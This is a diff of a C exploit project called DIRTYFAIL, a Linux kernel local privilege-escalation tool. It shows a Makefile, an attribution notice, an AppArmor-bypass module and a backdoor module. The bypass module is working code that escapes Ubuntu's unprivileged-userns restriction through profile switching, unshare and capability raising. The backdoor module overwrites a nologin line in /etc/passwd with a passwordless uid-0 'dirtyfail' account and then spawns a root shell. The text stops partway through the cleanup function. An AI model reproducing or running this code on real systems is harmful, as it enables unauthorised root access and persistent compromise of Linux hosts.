CFLAGS ?= -O2 -Wall -Wextra -Wno-unused-parameter -Wno-pointer-arith \
-D_GNU_SOURCE -D_FILE_OFFSET_BITS=64
LDFLAGS ?=
SRC_DIR := src
BUILD := build
SOURCES := $(wildcard $(SRC_DIR)/*.c)
OBJECTS := $(patsubst $(SRC_DIR)/%.c,$(BUILD)/%.o,$(SOURCES))
BIN := dirtyfail
.PHONY: all debug static clean scan install test test-fcrypt test-aes-ecb
all: $(BIN)
# === Tests ===========================================================
#
#   make test           build + run all primitive selftests
#   make test-fcrypt    just fcrypt (cipher, brute force); runs anywhere
#   make test-aes-ecb   AF_ALG ecb(aes) round-trip; Linux only
#
# Tests live in tests/, build standalone executables that link the
# minimum from src/. They don't pull in netlink / xfrm / rxrpc — those
# require root or AA bypass to exercise meaningfully and are tested
# end-to-end via `--exploit-* --no-shell` on a target host instead.
TEST_DIR := tests
TEST_BUILD:= $(BUILD)/tests
# fcrypt selftest needs only fcrypt + common (for log_*) — no Linux deps
$(TEST_BUILD)/test_fcrypt: $(TEST_DIR)/test_fcrypt.c $(SRC_DIR)/fcrypt.c $(SRC_DIR)/common.c | $(TEST_BUILD)
	$(CC) $(CFLAGS) -I$(SRC_DIR) -o $@ $^
# AES-ECB AF_ALG round-trip — Linux only, no DIRTYFAIL src deps
$(TEST_BUILD)/test_aes_ecb: $(TEST_DIR)/test_aes_ecb.c | $(TEST_BUILD)
	$(CC) $(CFLAGS) -o $@ $^
$(TEST_BUILD): | $(BUILD)
	@mkdir -p $(TEST_BUILD)
test-fcrypt: $(TEST_BUILD)/test_fcrypt
	@echo "=== test_fcrypt ==="
	$<
	@echo ""
test-aes-ecb: $(TEST_BUILD)/test_aes_ecb
	@echo "=== test_aes_ecb ==="
	$<
	@echo ""
test: test-fcrypt test-aes-ecb
	@echo "=== all primitive selftests passed ==="
$(BIN): $(OBJECTS)
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
$(BUILD)/%.o: $(SRC_DIR)/%.c $(SRC_DIR)/common.h | $(BUILD)
	$(CC) $(CFLAGS) -I$(SRC_DIR) -c -o $@ $<
$(BUILD):
	@mkdir -p $(BUILD)
debug: CFLAGS := -O0 -g3 -Wall -Wextra -Wno-unused-parameter -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64
debug: clean $(BIN)
# `make static` works best with musl-gcc; glibc static linking pulls in
# NSS at runtime which breaks getpwnam.
static: LDFLAGS += -static
static: clean $(BIN)
clean:
	rm -rf $(BUILD) $(BIN)
scan: $(BIN)
	./$(BIN) --scan
install: $(BIN)
	install -m 0755 $(BIN) /usr/local/bin/dirtyfail
+72
View File
@@ -0,0 +1,72 @@
# NOTICE
## fcrypt S-box constants and key schedule
`src/fcrypt.c` contains the four 256-byte S-box tables `SBOX0_RAW`,
`SBOX1_RAW`, `SBOX2_RAW`, and `SBOX3_RAW`, along with the 56-bit key
packing and 11-bit-rotation key schedule for the rxkad fcrypt cipher.
These tables and the key schedule are **protocol constants** of the
Andrew File System (AFS) rxkad authentication scheme. They appear
verbatim in:
- The Linux kernel's `crypto/fcrypt.c` (GPL-2.0,
Copyright © David Howells / KTH)
- IBM's open-source AFS distribution
- OpenAFS upstream
- Heimdal Kerberos (rxkad implementation)
Cryptographic constants required by a wire protocol are facts about
the protocol, not creative expression — using them is what makes
interoperability with the Linux kernel possible. We list this here for
transparency: while the S-box bytes are identical to the kernel's
table, the rest of `src/fcrypt.c` (table preprocessing, brute-force
harness, predicates, splitmix64 search) is independently written
DIRTYFAIL code under the project's MIT license.
If you intend to redistribute DIRTYFAIL in a context where strict
license compatibility matters, treat `src/fcrypt.c` as carrying the
same license obligations as the kernel `crypto/fcrypt.c` source for
the S-box constants alone.
## Reference exploits
The detection and exploit techniques in DIRTYFAIL were studied from:
- [Smarttfoxx/copyfail](https://github.com/Smarttfoxx/copyfail) — Copy
Fail original C PoC
- [rootsecdev/cve_2026_31431](https://github.com/rootsecdev/cve_2026_31431)
— Copy Fail Python detector + UID-flip exploit
- [V4bel/dirtyfrag](https://github.com/V4bel/dirtyfrag) — Dirty Frag
full chain PoC by Hyunwoo Kim ([@v4bel](https://x.com/v4bel))
DIRTYFAIL implementations are independently written in C, organized
around a single binary with detection-first defaults, but the protocol
mechanics (XFRM SA layout, RxRPC handshake forgery, rxkad checksum
formula) are necessarily identical to the upstream PoCs because they
target the same kernel interfaces.
## Additional techniques from 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
The following DIRTYFAIL features draw on techniques first published by
[0xdeadbeefnetwork](https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo):
- `src/copyfail_gcm.c` — `rfc4106(gcm(aes))` AEAD in xfrm-ESP, using
AES-GCM keystream brute-force to land a single byte at an arbitrary
file offset. Reimplemented in DIRTYFAIL style using AF_ALG instead
of OpenSSL EVP, eliminating the `libssl-dev` runtime dependency.
- `src/dirtyfrag_esp6.c` — IPv6 dual of xfrm-ESP. cf2 demonstrated the
esp6 size-gate workaround (≥48-byte frame); we reproduce that with
an 8-byte vmsplice'd pad.
- `src/apparmor_bypass.c` — the `change_onexec(crun)` →
`change_onexec(chrome)` → unshare re-exec dance to escape Ubuntu's
unprivileged-userns AppArmor restriction. cf2 credits the technique
to Brad Spengler (grsecurity); we expose it as a `--aa-bypass` flag
and auto-arm it when a restrictive profile is detected.
- `src/backdoor.c` — length-matched overwrite of a `nologin` line in
/etc/passwd with `dirtyfail::0:0:<pad>:/:/bin/bash`. cf2 publishes
the shell-script harness (and uses the username `sick`); DIRTYFAIL
ports it into a single C function driving our 1-byte primitive,
with the username matched to this project for easy auditing.
See [README §11 — Credits](README.md#11-credits) for the full list.
+365
View File
@@ -0,0 +1,365 @@
/*
* DIRTYFAIL — apparmor_bypass.c
*
* Implementation of the "switch profile + unshare" trick for getting
* CAP_NET_ADMIN inside a fresh user namespace on hardened Ubuntu.
* See apparmor_bypass.h for the high-level design.
*
* ATTRIBUTION: technique published in 0xdeadbeefnetwork/Copy_Fail2-
* Electric_Boogaloo (`aa-rootns.c`), credited there to Brad Spengler.
* This is an independent reimplementation in DIRTYFAIL's structure.
*/
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/wait.h>
#ifdef __linux__
#include <sched.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/capability.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/if.h>
#include <sys/ioctl.h>
#endif
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
#ifndef CLONE_NEWNET
#define CLONE_NEWNET 0x40000000
#endif
/*
* Once stage 2 has successfully unshared and elevated us into a fresh
* userns with full caps, this flag is set. apparmor_bypass_needed()
* short-circuits on it so main() doesn't re-arm the bypass after stage
* 2 returns — that would create a NESTED userns each iteration and
* eventually fail with ENOSPC at the nesting cap.
*
* The flag is process-local; it resets to false on every fresh exec,
* which is exactly what we want — each stage's main() starts fresh.
*/
static bool g_bypass_done = false;
bool apparmor_bypass_was_armed(void) { return g_bypass_done; }
bool apparmor_userns_caps_blocked(void)
{
#ifdef __linux__
/* Quick check: if the AA sysctl isn't there or is 0, no blocking. */
int fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns",
O_RDONLY);
if (fd < 0) return false; /* no AA hardening sysctl */
char b[8] = {0};
ssize_t n = read(fd, b, sizeof(b) - 1);
close(fd);
if (n <= 0 || b[0] != '1') return false;
/* Sysctl says hardened. Confirm by forking a child that
* unshares(USER) and tries to write to /proc/self/setgroups —
* a CAP_SYS_ADMIN-gated operation that would succeed inside a
* fresh userns IFF caps survived the transition. On 26.04-style
* hardening the auto-transition to unprivileged_userns sub-
* profile denies the cap, write fails with EPERM. */
pid_t pid = fork();
if (pid < 0) return false;
if (pid == 0) {
if (syscall(SYS_unshare, CLONE_NEWUSER) != 0) _exit(1);
int wfd = open("/proc/self/setgroups", O_WRONLY);
if (wfd < 0) _exit(2); /* EPERM here = blocked */
ssize_t w = write(wfd, "deny", 4);
close(wfd);
_exit(w == 4 ? 0 : 3); /* 0 = caps work, 3 = blocked */
}
int wstat = 0;
waitpid(pid, &wstat, 0);
/* Caps work if child exited 0; any non-zero means blocked or error. */
return !(WIFEXITED(wstat) && WEXITSTATUS(wstat) == 0);
#else
return false;
#endif
}
/* ---------------------------------------------------------------- *
* Profile switch primitive
*
* Writing "exec <profile>" to /proc/self/attr/exec asks the kernel to
* switch to the named AppArmor profile on the *next* execve. The
* switch is silent if the profile doesn't exist (the next exec just
* stays in the current profile); we don't get an error until we try
* to use a capability the current profile would have blocked. So we
* try multiple candidate profiles in priority order.
* ---------------------------------------------------------------- */
#ifdef __linux__
static int change_onexec(const char *profile)
{
int fd = open("/proc/self/attr/exec", O_WRONLY);
if (fd < 0) return -1;
char b[256];
int n = snprintf(b, sizeof(b), "exec %s", profile);
ssize_t r = write(fd, b, n);
int e = errno;
close(fd);
errno = e;
return r == n ? 0 : -1;
}
static bool write_proc(const char *path, const char *value)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t n = write(fd, value, strlen(value));
close(fd);
return n == (ssize_t)strlen(value);
}
#endif
/* ---------------------------------------------------------------- *
* Profile probe — read /proc/self/attr/current
*
* Output looks like one of:
*
* "unconfined\n" — not restricted
* "/usr/bin/dirtyfail (enforce)\n" — restricted!
* "unprivileged_userns (enforce)\n" — Ubuntu 24.04 default
* ---------------------------------------------------------------- */
bool apparmor_bypass_needed(void)
{
#ifdef __linux__
/* If stage 2 already ran in this process, we've already entered a
* fresh userns with caps — don't re-arm or we'd nest further. */
if (g_bypass_done) return false;
/* First check the kernel sysctl. On Ubuntu 24.04 and similar
* hardened distros, `kernel.apparmor_restrict_unprivileged_userns=1`
* silently strips caps inside ANY userns we create — REGARDLESS of
* whether /proc/self/attr/current shows "unconfined". This sysctl
* is the authoritative signal; it short-circuits the probe. */
int fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", O_RDONLY);
if (fd >= 0) {
char b[8] = {0};
ssize_t n = read(fd, b, sizeof(b) - 1);
close(fd);
if (n > 0 && b[0] == '1') return true;
}
/* No global sysctl restriction. AppArmor may still be enforcing
* a per-profile rule, so check /proc/self/attr/current. If that
* file is missing entirely, AppArmor isn't loaded → no bypass. */
fd = open("/proc/self/attr/current", O_RDONLY);
if (fd < 0) return false;
char buf[256];
ssize_t n = read(fd, buf, sizeof(buf) - 1);
close(fd);
if (n <= 0) return false;
buf[n] = '\0';
/* "unconfined" with no global sysctl restriction → no bypass needed.
* NOTE: we already excluded the Ubuntu 24.04 case above; only here
* if the sysctl is 0 or the sysctl file doesn't exist. */
if (strncmp(buf, "unconfined", 10) == 0) return false;
/* Anything else (including "(enforce)" and "(complain)") is
* potentially restricting our userns caps. Run an empirical probe:
* fork → child does unshare(CLONE_NEWUSER | CLONE_NEWNET) → tries
* to bring `lo` up, which needs CAP_NET_ADMIN → if that fails,
* bypass IS needed. */
pid_t pid = fork();
if (pid < 0) return false;
if (pid == 0) {
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0)
_exit(1);
write_proc("/proc/self/setgroups", "deny");
char m[64];
snprintf(m, sizeof(m), "0 %u 1", (unsigned)getuid());
write_proc("/proc/self/uid_map", m);
snprintf(m, sizeof(m), "0 %u 1", (unsigned)getgid());
write_proc("/proc/self/gid_map", m);
/* The decisive probe: bring lo up. Needs CAP_NET_ADMIN. */
int s = socket(AF_INET, SOCK_DGRAM, 0);
if (s < 0) _exit(2);
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
if (ioctl(s, SIOCGIFFLAGS, &ifr) != 0) { close(s); _exit(3); }
ifr.ifr_flags |= IFF_UP;
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
close(s);
_exit(rc == 0 ? 0 : 4);
}
int wstat = 0;
waitpid(pid, &wstat, 0);
bool caps_work = WIFEXITED(wstat) && WEXITSTATUS(wstat) == 0;
return !caps_work;
#else
return false;
#endif
}
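
The label formats listed in the profile-probe comment above can be classified with plain string handling. This is a minimal sketch under stated assumptions: `enum aa_mode`, `ends_with` and `aa_label_mode` are hypothetical names, not DIRTYFAIL symbols, and the sketch matches `unconfined` exactly, whereas the function above uses a 10-byte prefix comparison.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Hypothetical classification of /proc/self/attr/current contents. */
enum aa_mode { AA_UNCONFINED, AA_ENFORCE, AA_COMPLAIN, AA_OTHER };

/* True when the first `len` bytes of `s` end with `suffix`. */
static bool ends_with(const char *s, size_t len, const char *suffix)
{
    size_t sl = strlen(suffix);
    return len >= sl && memcmp(s + len - sl, suffix, sl) == 0;
}

/* Classify a label such as "unconfined\n" or "foo (enforce)\n". */
static enum aa_mode aa_label_mode(const char *text)
{
    assert(text != NULL);
    size_t len = strcspn(text, "\n");          /* ignore the trailing newline */
    if (len == 10 && memcmp(text, "unconfined", 10) == 0)
        return AA_UNCONFINED;
    if (ends_with(text, len, " (enforce)"))  return AA_ENFORCE;
    if (ends_with(text, len, " (complain)")) return AA_COMPLAIN;
    return AA_OTHER;
}
```

Operating on a string rather than on the file keeps the classification testable without an AppArmor-enabled host.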
/* ---------------------------------------------------------------- *
* Stage handlers
* ---------------------------------------------------------------- */
bool apparmor_bypass_is_stage(int argc, char **argv)
{
return argc >= 2 &&
(strcmp(argv[1], AA_STAGE1_TAG) == 0 ||
strcmp(argv[1], AA_STAGE2_TAG) == 0);
}
int apparmor_bypass_run_stage(int argc, char **argv,
int *out_argc, char ***out_argv)
{
#ifdef __linux__
if (argc < 2) return -1;
if (strcmp(argv[1], AA_STAGE1_TAG) == 0) {
/* We are now in the `crun` profile (unconfined + userns).
* Originally we did a second hop to `chrome` for extra paranoia,
* mirroring aa-rootns; in practice that hop fails on Ubuntu
* 24.04 with ENOSPC from the subsequent unshare for reasons
* that aren't fully understood (possibly a per-profile userns
* accounting wrinkle). One hop into crun is sufficient — crun
* already has `userns,` and `flags=(unconfined)`, so unshare
* works and we keep things simple. Just re-exec with STAGE2
* to drop into the unshare+capset step. */
argv[1] = (char *)AA_STAGE2_TAG;
execv("/proc/self/exe", argv);
return -1; /* execv only returns on failure */
}
if (strcmp(argv[1], AA_STAGE2_TAG) == 0) {
/* We are now in an unconfined profile. Do the userns + capset
* dance ourselves so the next code path inherits root in the
* userns and full caps. */
uid_t u = getuid();
gid_t g = getgid();
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
log_bad("apparmor_bypass: unshare failed: %s", strerror(errno));
return -1;
}
write_proc("/proc/self/setgroups", "deny");
char m[64];
snprintf(m, sizeof(m), "0 %u 1", (unsigned)u);
write_proc("/proc/self/uid_map", m);
snprintf(m, sizeof(m), "0 %u 1", (unsigned)g);
write_proc("/proc/self/gid_map", m);
/* Drop into uid 0 inside the new userns. */
if (setresuid(0, 0, 0) != 0) { log_bad("setresuid: %s", strerror(errno)); }
if (setresgid(0, 0, 0) != 0) { log_bad("setresgid: %s", strerror(errno)); }
/* Promote permitted → inheritable, then ambient — so caps
* survive any execvp the caller does later. */
struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
struct __user_cap_data_struct d[2];
memset(d, 0, sizeof(d));
if (syscall(SYS_capget, &h, d) == 0) {
d[0].inheritable = d[0].permitted;
d[1].inheritable = d[1].permitted;
syscall(SYS_capset, &h, d);
for (int c = 0; c < 64; c++)
prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0);
}
/* Bring lo up — most consumers need it. */
int s = socket(AF_INET, SOCK_DGRAM, 0);
if (s >= 0) {
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {
ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
ioctl(s, SIOCSIFFLAGS, &ifr);
}
close(s);
}
/* Strip the stage marker from argv so main() sees its normal args. */
for (int i = 1; i + 1 < argc; i++) argv[i] = argv[i + 1];
argv[argc - 1] = NULL;
*out_argc = argc - 1;
*out_argv = argv;
g_bypass_done = true; /* prevents re-arm in main() */
log_ok("apparmor bypass complete — uid=%u, in fresh userns", getuid());
return 0;
}
#else
(void)argc; (void)argv; (void)out_argc; (void)out_argv;
#endif
return -1;
}
int apparmor_bypass_fork_arm(int argc, char **argv)
{
#ifdef __linux__
/* Caller may pass argc=0/argv=NULL; arm_and_relaunch needs a
* valid argv[0] for execv. Fabricate a minimal one if needed. */
char *fallback[2] = { (char *)"dirtyfail", NULL };
if (argc <= 0 || argv == NULL || argv[0] == NULL) {
argc = 1;
argv = fallback;
}
pid_t child = fork();
if (child < 0) return -1;
if (child == 0) {
/* Child arms the bypass and execs through the stages. Env
* vars set by the caller (DIRTYFAIL_INNER_MODE etc.) survive
* execv, so stage 2 sees them. */
apparmor_bypass_arm_and_relaunch(argc, argv);
/* arm_and_relaunch only returns on failure. */
log_bad("child: bypass arm failed: %s", strerror(errno));
_exit(1);
}
int wstat = 0;
if (waitpid(child, &wstat, 0) < 0) return -1;
if (WIFEXITED(wstat)) return WEXITSTATUS(wstat);
if (WIFSIGNALED(wstat)) {
log_bad("child killed by signal %d", WTERMSIG(wstat));
return -1;
}
return -1;
#else
(void)argc; (void)argv; return -1;
#endif
}
int apparmor_bypass_arm_and_relaunch(int argc, char **argv)
{
#ifdef __linux__
/* On AppArmor-restricted systems (Ubuntu 24.04+), switch to an
* unconfined profile via change_onexec so the post-exec userns
* unshare retains caps. On non-AppArmor systems
* (Debian/Alma/Fedora/etc.) /proc/self/attr/exec doesn't exist,
* change_onexec fails — that's fine, unshare works without any
* profile gymnastics on those kernels. Fail through gracefully. */
if (change_onexec("crun") < 0)
change_onexec("chrome"); /* best effort, both may no-op */
/* Build a new argv: [argv[0], AA_STAGE1_TAG, original argv[1..]]. */
char **na = calloc(argc + 2, sizeof(char *));
if (!na) return -1;
na[0] = argv[0];
na[1] = (char *)AA_STAGE1_TAG;
for (int i = 1; i < argc; i++) na[i + 1] = argv[i];
na[argc + 1] = NULL;
log_step("apparmor bypass armed — re-execing self via crun/chrome profile");
execv("/proc/self/exe", na);
/* If execv fails, fall through and let main() proceed un-bypassed. */
int e = errno;
free(na);
errno = e;
#else
(void)argc; (void)argv;
#endif
return -1;
}
+113
@@ -0,0 +1,113 @@
/*
* DIRTYFAIL — apparmor_bypass.h
*
* Defeat Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy.
*
* The default Ubuntu apparmor profile applied to unprivileged programs
* lets `unshare(CLONE_NEWUSER)` succeed but **strips CAP_NET_ADMIN**
* inside the new namespace — so XFRM SA registration, raw sockets, etc.
* fail downstream even though we appear to be uid 0 in our userns.
*
* The bypass: switch to a permissive AppArmor profile (`crun`, `chrome`,
* etc.) via `change_onexec` *before* unshare. Those profiles don't
* carry the userns-cap-strip rule, so the kernel hands us the full
* effective set inside the new namespace.
*
* Mechanics — three stages, two re-execs:
*
* stage 0 (entry): change_onexec(crun), falling back to chrome;
* execv(self, AA1, ...args)
* stage 1 (in crun): execv(self, AA2, ...args), no second profile hop
* stage 2 (in crun): unshare(USER|NET); maps; capset; ambient caps;
* re-enter normal main() flow with bypass marked
*
* `aa-rootns` (Brad Spengler / 0xdeadbeef) demonstrated a two-hop
* crun → chrome dance. apparmor_bypass.c keeps only the crun hop: per
* the note in apparmor_bypass_run_stage(), the chrome hop made the
* subsequent unshare fail with ENOSPC on Ubuntu 24.04, and the "crun"
* profile is already unconfined for our purposes.
*
* Detection of "do we need the bypass?" is best-effort:
* - read the kernel.apparmor_restrict_unprivileged_userns sysctl;
* if it is 1, the bypass is needed.
* - otherwise read /proc/self/attr/current; "unconfined" (or no
* AppArmor at all) means no bypass is needed.
* - otherwise probe by spawning a child that does
* unshare(CLONE_NEWUSER | CLONE_NEWNET) and tries to bring `lo`
* up; if that fails, the caps were stripped.
*/
#ifndef DIRTYFAIL_APPARMOR_BYPASS_H
#define DIRTYFAIL_APPARMOR_BYPASS_H
#include "common.h"
/* Stage markers used as argv[1] to route re-execs. */
#define AA_STAGE1_TAG "DIRTYFAIL-AA-STAGE-1"
#define AA_STAGE2_TAG "DIRTYFAIL-AA-STAGE-2"
/* Returns true if `argv[1]` is one of the AA-* stage markers, in which
* case main() should hand control to apparmor_bypass_run_stage(). */
bool apparmor_bypass_is_stage(int argc, char **argv);
/* Execute the appropriate stage based on argv[1]. This either re-execs
* self (stage 1) or returns the modified argv after unshare+caps setup
* for the caller to continue with (stage 2). The function does not
* return on stage 1 (always execv). On stage 2, returns 0 on success
* and writes the caller's continuation argv to *out_argc / *out_argv. */
int apparmor_bypass_run_stage(int argc, char **argv,
int *out_argc, char ***out_argv);
/* Probe: does this process actually need the bypass to gain
* CAP_NET_ADMIN inside a fresh user namespace? Returns true if YES. */
bool apparmor_bypass_needed(void);
/* True iff stage 2 of the bypass ran successfully in this process —
* i.e. we're now inside a fresh user/net namespace with full caps,
* and any further unshare() would nest. Exploit modules check this
* before deciding whether to fork+unshare on their own. */
bool apparmor_bypass_was_armed(void);
/* Probe whether the bypass actually grants caps on this kernel.
* Forks a child that does unshare(USER) and tries to write to
* /proc/self/setgroups; if that fails with EPERM, we're on a kernel
* (Ubuntu 26.04+) that auto-transitions to the unprivileged_userns
* sub-profile and denies caps regardless of bypass technique.
*
* Returns true if unprivileged userns is COMPREHENSIVELY blocked
* (the bug class is unreachable for unprivileged users). Returns
* false if userns operations work normally OR if AA isn't loaded
* at all (in which case `apparmor_bypass_needed()` would also
* return false).
*
* This is the right signal for `--scan` to report "VULNERABLE in
* kernel but LSM-mitigated" vs plain "VULNERABLE".
*/
bool apparmor_userns_caps_blocked(void);
/* Fork a child that arms the AA bypass and re-execs itself through
* the stages. The child eventually lands inside a fresh user/net
* namespace with full caps; main() in that re-exec'd image dispatches
* to the inner-mode handler indicated by the DIRTYFAIL_INNER_MODE
* environment variable.
*
* The PARENT stays in the init namespace and waits for the child via
* waitpid. After the child exits, the parent can read the global
* page cache (which reflects whatever the child modified) and then
* execlp("su", ...) in init namespace to reach REAL init-ns root —
* this is the whole point of the outer/inner split.
*
* Caller must setenv("DIRTYFAIL_INNER_MODE", "...", 1) and any other
* mode-specific env vars BEFORE calling this. The child inherits the
* full environment.
*
* Returns the child's exit code if it exited normally. Returns -1 if
* fork or waitpid failed, or if the child was killed by a signal. */
int apparmor_bypass_fork_arm(int argc, char **argv);
/* Trigger the bypass: change_onexec(crun) then re-exec self with stage
* markers. Caller passes the argv it wants to resume with (stage 2 will
* hand that argv back via apparmor_bypass_run_stage's out_argv).
*
* Does not return on success (control transfers to the new process
* image). A failed change_onexec is ignored (best effort). Returns -1
* with errno set if the argv allocation or execv failed; in that case
* the caller may continue without bypass and let downstream syscalls
* fail loudly. */
int apparmor_bypass_arm_and_relaunch(int argc, char **argv);
#endif
+382
@@ -0,0 +1,382 @@
/*
* DIRTYFAIL — backdoor.c
*
* Persistent uid-0 backdoor via length-matched /etc/passwd line
* substitution. See backdoor.h for the design rationale.
*
* Flow:
*
* install:
* 1. parse /etc/passwd, find longest line with nologin/false/sync shell
* 2. compute replacement "dirtyfail::0:0:<pad>:/:/bin/bash" same length
* 3. snapshot state to /var/tmp/.dirtyfail.state
* 4. for each byte that differs:
* cfg_1byte_write(/etc/passwd, byte_off, new_byte)
* 5. exec su - dirtyfail (PAM nullok accepts empty password)
*
* cleanup:
* 1. read state (LINE_OFF, original VICTIM_LINE)
* 2. read current page-cache bytes at that line
* 3. for each byte that differs from VICTIM_LINE:
* cfg_1byte_write(/etc/passwd, byte_off, original_byte)
* 4. delete state file
*/
#include "backdoor.h"
#include "copyfail_gcm.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <stdlib.h>
#include <sys/stat.h>
#define STATE_FILE "/var/tmp/.dirtyfail.state"
#define NEW_USER "dirtyfail"
#define DF_PREFIX "dirtyfail::0:0:"
#define DF_SUFFIX ":/:/bin/bash"
/* ---- /etc/passwd line picker ---------------------------------------- *
*
* Walk lines, parse to find the shell field (last colon-separated
* field), accept if shell is one of the canonical "no-login" shells.
* Pick the longest acceptable line so the replacement has room for
* padding.
*/
/* Line buffer is 512 bytes — enough for any sane /etc/passwd entry,
* including ones with very long gecos strings or unusual home paths.
* Lines longer than this are silently skipped by find_victim(). */
struct victim {
off_t line_off;
size_t line_len;
char line[512];
char name[64];
};
static bool is_nologin_shell(const char *shell)
{
static const char *deny[] = {
"/usr/sbin/nologin",
"/sbin/nologin",
"/bin/false",
"/usr/bin/false",
"/bin/sync",
NULL,
};
for (size_t i = 0; deny[i]; i++)
if (strcmp(shell, deny[i]) == 0) return true;
return false;
}
static bool find_victim(struct victim *v)
{
int fd = open("/etc/passwd", O_RDONLY);
if (fd < 0) { log_bad("open /etc/passwd: %s", strerror(errno)); return false; }
struct stat st;
if (fstat(fd, &st) < 0) { close(fd); return false; }
char *buf = malloc(st.st_size + 1);
if (!buf) { close(fd); return false; }
ssize_t n = read(fd, buf, st.st_size);
close(fd);
if (n <= 0) { free(buf); return false; }
buf[n] = '\0';
bool found = false;
char *line = buf;
char *end = buf + n;
while (line < end) {
char *nl = memchr(line, '\n', end - line);
size_t len = nl ? (size_t)(nl - line) : (size_t)(end - line);
if (len == 0 || len >= sizeof(v->line)) goto next;
char tmp[512];
memcpy(tmp, line, len);
tmp[len] = '\0';
/* Last field after final ':' is the shell. */
char *shell = strrchr(tmp, ':');
if (!shell) goto next;
shell++;
if (!is_nologin_shell(shell)) goto next;
if (len > v->line_len) {
v->line_off = line - buf;
v->line_len = len;
memcpy(v->line, line, len);
v->line[len] = '\0';
char *colon = memchr(v->line, ':', len);
size_t nlen = colon ? (size_t)(colon - v->line) : len;
if (nlen >= sizeof(v->name)) nlen = sizeof(v->name) - 1;
memcpy(v->name, v->line, nlen);
v->name[nlen] = '\0';
found = true;
}
next:
if (!nl) break;
line = nl + 1;
}
free(buf);
return found;
}
/* ---- state file ----------------------------------------------------- */
static bool save_state(off_t line_off, const char *victim_line, size_t len)
{
int fd = open(STATE_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0600);
if (fd < 0) { log_bad("open state: %s", strerror(errno)); return false; }
char buf[2048];
int n = snprintf(buf, sizeof(buf), "LINE_OFF=%lld\nVICTIM_LEN=%zu\nVICTIM_LINE=",
(long long)line_off, len);
bool ok = (write(fd, buf, n) == n)
&& (write(fd, victim_line, len) == (ssize_t)len)
&& (write(fd, "\n", 1) == 1);
close(fd);
if (!ok) {
log_bad("save_state write: %s", strerror(errno));
unlink(STATE_FILE);
}
return ok;
}
static bool load_state(off_t *line_off, char *victim_line, size_t cap, size_t *len)
{
int fd = open(STATE_FILE, O_RDONLY);
if (fd < 0) return false;
char buf[2048];
ssize_t n = read(fd, buf, sizeof(buf) - 1);
close(fd);
if (n <= 0) return false;
buf[n] = '\0';
char *p = strstr(buf, "LINE_OFF=");
if (!p) return false;
*line_off = (off_t)strtoll(p + 9, NULL, 10);
char *v = strstr(buf, "VICTIM_LINE=");
if (!v) return false;
v += 12;
char *end = strchr(v, '\n');
if (!end) end = buf + n;
size_t vlen = end - v;
if (vlen >= cap) return false;
memcpy(victim_line, v, vlen);
victim_line[vlen] = '\0';
*len = vlen;
return true;
}
/* Describe state file if present, for `--list-state`. Returns true if a
* backdoor state file was found and described, false if absent. */
bool backdoor_list_state(void)
{
off_t off = 0;
char victim[2048];
size_t len = 0;
if (!load_state(&off, victim, sizeof(victim), &len))
return false;
log_warn("backdoor planted — state file %s", STATE_FILE);
log_hint(" victim line was at offset %lld (%zu bytes)",
(long long)off, len);
log_hint(" original line: %s", victim);
log_hint(" the page cache currently has 'dirtyfail::0:0:...:/:/bin/bash'");
log_hint(" in place of the above. Revert with `--cleanup-backdoor`.");
return true;
}
/* ---- byte-flip helper ----------------------------------------------- *
*
* For each char position where `cur[i] != target[i]`, call the
* 1-byte primitive to land the new byte. Linear in number of
* differing bytes; on a typical /etc/passwd line that's ~30-40 flips.
*/
static bool apply_flips(off_t base_off, const char *cur, const char *want, size_t len)
{
size_t flips = 0;
for (size_t i = 0; i < len; i++) {
if (cur[i] == want[i]) continue;
if (!cfg_1byte_write("/etc/passwd",
base_off + i, (unsigned char)want[i])) {
log_bad("byte flip failed at offset %lld",
(long long)(base_off + i));
return false;
}
flips++;
if ((flips & 7) == 0) putchar('.'), fflush(stdout);
}
if (flips) putchar('\n');
log_step("applied %zu byte flips", flips);
return true;
}
/* ---- INNER (bypass userns) — does only the byte flips ------------- */
df_result_t backdoor_install_inner(void)
{
const char *off_s = getenv("DIRTYFAIL_LINE_OFF");
const char *victim_s = getenv("DIRTYFAIL_VICTIM_LINE");
const char *target_s = getenv("DIRTYFAIL_TARGET_LINE");
if (!off_s || !victim_s || !target_s) {
log_bad("inner: DIRTYFAIL_LINE_OFF / VICTIM_LINE / TARGET_LINE not set");
return DF_TEST_ERROR;
}
off_t line_off = (off_t)atoll(off_s);
size_t len = strlen(victim_s);
if (strlen(target_s) != len) {
log_bad("inner: victim/target lengths differ (%zu vs %zu)",
len, strlen(target_s));
return DF_TEST_ERROR;
}
if (!apply_flips(line_off, victim_s, target_s, len)) {
return DF_EXPLOIT_FAIL;
}
return DF_EXPLOIT_OK;
}
df_result_t backdoor_cleanup_inner(void)
{
const char *off_s = getenv("DIRTYFAIL_LINE_OFF");
const char *victim_s = getenv("DIRTYFAIL_VICTIM_LINE");
const char *target_s = getenv("DIRTYFAIL_TARGET_LINE");
if (!off_s || !victim_s || !target_s) {
log_bad("inner-cleanup: env vars not set");
